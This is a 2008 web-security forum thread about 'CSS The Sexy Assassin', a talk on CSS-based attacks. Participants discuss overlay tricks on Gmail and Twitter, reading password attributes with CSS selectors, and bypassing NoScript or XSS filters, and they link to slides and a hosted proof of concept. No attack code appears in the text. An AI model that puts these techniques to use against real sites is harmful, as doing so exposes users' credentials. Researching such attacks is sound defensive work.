Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
If you have some interesting news or want to throw up a link to discuss it, here's the place. Anything is okay, even shameless vendor launches (since that is often applicable to what we work on). 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
CSS The Sexy Assassin
Posted by: sirdarckcat
Date: October 22, 2008 10:41AM

Looking for feedback =)

http://sirdarckcat.blogspot.com/2008/10/about-css-attacks.html
http://www.thespanner.co.uk/wp-content/uploads/2008/10/the_sexy_assassin2ppt.zip

what do you think guys? a lot of people have used the gmail overlay stuff hehe, Im receiving lots of "overlaysuccesfull" emails =D, twitter victims are not that many: http://search.twitter.com/search?q=I+love+coconuts

This last ones could be used for CSS Worms =)

The attribute reading stuff I think deserves some sort of discussing, and the CSSH-mon is pretty scary isnt it? what do you guys think?

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat



Edited 1 time(s). Last edit at 10/22/2008 10:43AM by sirdarckcat.

Options: ReplyQuote
Re: CSS The Sexy Assassin
Posted by: Anonymous User
Date: October 22, 2008 02:47PM

As I already told you guys via IM - the attribute reader is at top position in my this year's list of client side trickery. Absolutely awesome work - who needs click-jacking anyway when you can read passwords with thousands of lines of CSS :)

Options: ReplyQuote
Re: CSS The Sexy Assassin
Posted by: sirdarckcat
Date: October 26, 2008 02:20PM

hey!
thanks mario ;)
The best attack I've think of requires still 2 requests.. but I hope a one-request attack can be found =)

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: CSS The Sexy Assassin
Posted by: Gareth Heyes
Date: October 26, 2008 02:48PM

One request is possible for 6 char values :)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: CSS The Sexy Assassin
Posted by: sirdarckcat
Date: October 26, 2008 05:00PM

[\x11-\x7F] Range?

What's the size?

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote
Re: CSS The Sexy Assassin
Posted by: Gareth Heyes
Date: October 26, 2008 05:27PM

35152 rules all lowercase letters

I've PM'd you the poc

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: CSS The Sexy Assassin
Posted by: Anonymous User
Date: October 27, 2008 05:35AM

Can you sent send me the rules too plz?

Options: ReplyQuote
Re: CSS The Sexy Assassin
Posted by: Gareth Heyes
Date: October 27, 2008 07:00AM

Yeah sure, I just didn't want to overload my server. PM'd now

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: CSS The Sexy Assassin
Posted by: Anonymous User
Date: October 27, 2008 07:03AM

Thx - I'll slashdot it asap :)

Options: ReplyQuote
Re: CSS The Sexy Assassin
Posted by: Gareth Heyes
Date: October 27, 2008 07:19AM

LOL I'll send you the bandwidth bill

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: CSS The Sexy Assassin
Posted by: zeno
Date: October 27, 2008 11:21AM

I was at Bluehat ( http://www.cgisecurity.org/2008/10/my-trip-to-blue.html ) and saw your talk. The CSSH demo was good at automatically demonstrating the problem.

Good work.

- zeno

Options: ReplyQuote
Re: CSS The Sexy Assassin
Posted by: thornmaker
Date: October 27, 2008 12:03PM

Thanks Zeno! I'm glad you liked it. It was kinda awkward having to push all the PoC's until the end, but hopefully everyone followed :)

Options: ReplyQuote
Re: CSS The Sexy Assassin
Posted by: id
Date: October 27, 2008 02:37PM

if you need something hosted pm me.

-id

Options: ReplyQuote
Re: CSS The Sexy Assassin
Posted by: Gareth Heyes
Date: October 27, 2008 03:02PM

@id

Thanks

The script itself is a CPU hog and it generates a 2mb stylesheet on each request so I dunno if you'd wanna host it. I could just post the static output of the HTML file

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: CSS The Sexy Assassin
Posted by: id
Date: October 27, 2008 03:11PM

this box is a quad 2.8ghz, mostly just doing nothing, so I doubt it would hurt it.

-id

Options: ReplyQuote
Re: CSS The Sexy Assassin
Posted by: Gareth Heyes
Date: October 27, 2008 03:16PM

Ok cool nice one thanks I'll PM you the source (php btw)

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: CSS The Sexy Assassin
Posted by: Gareth Heyes
Date: October 27, 2008 03:54PM

Big thanks to ID for hosting

http://sla.ckers.org/files/css_tokens.php

The original work was by sirdarckcat, I've just bruteforced the stylesheet in one request.

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: CSS The Sexy Assassin
Posted by: Raz0r
Date: November 03, 2008 02:40PM

Really interesting idea of using CSS for attribute reading. But don't you think that there is more theory than the practical usage? Under what circumstances and conditions that could be used in real life? I hardly believe that CSS attribute reading could be useful in XSS...

http://Raz0r.name - a web-security blog ( in Russian )

Options: ReplyQuote
Re: CSS The Sexy Assassin
Posted by: kuza55
Date: November 04, 2008 05:19AM

Raz0r Wrote:
-------------------------------------------------------
> Really interesting idea of using CSS for attribute
> reading. But don't you think that there is more
> theory than the practical usage? Under what
> circumstances and conditions that could be used in
> real life? I hardly believe that CSS attribute
> reading could be useful in XSS...

This could potentially be used to attack a target running NoScript, or bypass XSS Filters.

----------------------------------------------------------
Don't forget our IRC: irc://irc.irchighway.net/#slackers
[kuza55.blogspot.com]

Options: ReplyQuote
Re: CSS The Sexy Assassin
Posted by: Raz0r
Date: November 04, 2008 11:18AM

Thx, now i see. But hasn't NoScript implemented protection against cssar yet?

http://Raz0r.name - a web-security blog ( in Russian )



Edited 1 time(s). Last edit at 11/08/2008 01:15PM by Raz0r.

Options: ReplyQuote
Re: CSS The Sexy Assassin
Posted by: Anonymous User
Date: November 04, 2008 11:19AM

But not with 32K selectors minimum for alphanumeric values - it's a PoC and not an exploit imho. But very interesting anyway.

Options: ReplyQuote
Re: CSS The Sexy Assassin
Posted by: sirdarckcat
Date: November 05, 2008 11:47AM

Yeah, we havent implemented any exploits using this.. anyway, there's definatelly the posibillity..

There's also the fact that if the target website uses HTML Purifier or something like that, this may (depends) make a succesfull attack..

Greetz!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

Options: ReplyQuote


Sorry, only registered users may post in this forum.